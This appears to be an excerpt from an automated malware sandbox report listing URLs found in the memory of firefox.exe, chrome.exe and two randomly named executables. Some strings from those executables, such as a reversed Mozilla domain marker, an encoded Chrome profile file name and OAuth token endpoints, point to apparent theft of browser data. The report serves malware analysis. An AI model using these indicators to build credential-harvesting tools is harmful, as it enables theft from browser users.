                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
                          Source: firefox.exe, 00000030.00000003.3106406210.000001E58046F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                          Source: firefox.exe, 00000030.00000003.3141473076.000001E57D8C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 00000021.00000002.2924951392.000001F3C3E08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 00000030.00000003.3219583721.000001E57D183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                          Source: firefox.exe, 00000030.00000003.3219583721.000001E57D183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647233324.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2807844485.0000000005EB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                          Source: firefox.exe, 00000030.00000003.3093201942.000001E5804F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2878362394.00000000060B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: firefox.exe, 00000030.00000003.3113576631.000001E5779BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translation
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2878362394.00000000060B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: a78a39a396.exe, 0000000A.00000003.3056967166.00000000241BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647233324.0000000005E1C000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000003.2895029279.000000001DD01000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2808873337.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2807844485.0000000005EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2808873337.0000000005E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647233324.0000000005E1C000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000003.2895029279.000000001DD01000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2808873337.0000000005EAB000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2807844485.0000000005EB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2808873337.0000000005E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                          Source: firefox.exe, 00000030.00000003.2976595956.000001E575073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://svgwg.org/svg2-draft/struct.html#SymbolNotes:
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
                          Source: firefox.exe, 00000030.00000003.2988711398.000001E575B76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-west-first-party-cookies).
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://topsites.services.mozilla.com/cid/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
                          Source: firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webcompat.com/issues/new
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3044314629.000001E57D65B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                          Source: 7b9f3f6834.exe, 00000009.00000003.2723646367.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2724507880.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F62000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2879532375.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2912418827.000001C300FC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3234358102.000001E575C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 00000030.00000003.2990821035.000001E575D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.certificate-transparency.org/what-is-ct
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: 7b9f3f6834.exe, 00000009.00000003.2723646367.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2724507880.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F62000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2879532375.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2912418827.000001C300FC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                          Source: firefox.exe, 0000001A.00000003.2899243856.0000018D7CF4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3037759194.000001E57D40D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
                          Source: firefox.exe, 0000001A.00000003.2819477848.0000018D7271E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2818931962.0000018D74800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2820218486.0000018D7273A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2822012559.0000018D72773000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2821424363.0000018D72757000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3024454780.000001E575DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                          Source: chrome.exe, 00000022.00000003.2885581063.00007DA402460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885043391.00007DA40245C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2885855829.00007DA402464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                          Source: firefox.exe, 00000030.00000003.3135955802.000001E58025E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3093201942.000001E5804F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3135955802.000001E580270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
                          Source: firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.mozilla.org/about/FIIECAKFHIJE
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.mozilla.org/about/dHh0
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2878362394.00000000060B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: firefox.exe, 00000030.00000003.3062213581.000001E57D754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2878362394.00000000060B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: 7b9f3f6834.exe, 00000009.00000003.2699842330.00000000060E9000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000003.3056967166.00000000241BF000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2878362394.00000000060B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2878362394.00000000060B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
                          Source: firefox.exe, 00000021.00000002.2921553083.000001F3C37C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/0
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                          Source: 7b9f3f6834.exe, 00000009.00000003.2699842330.00000000060E9000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000003.3056967166.00000000241BF000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2878362394.00000000060B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000E37000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                          Source: firefox.exe, 00000030.00000003.3224140114.000001E578A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
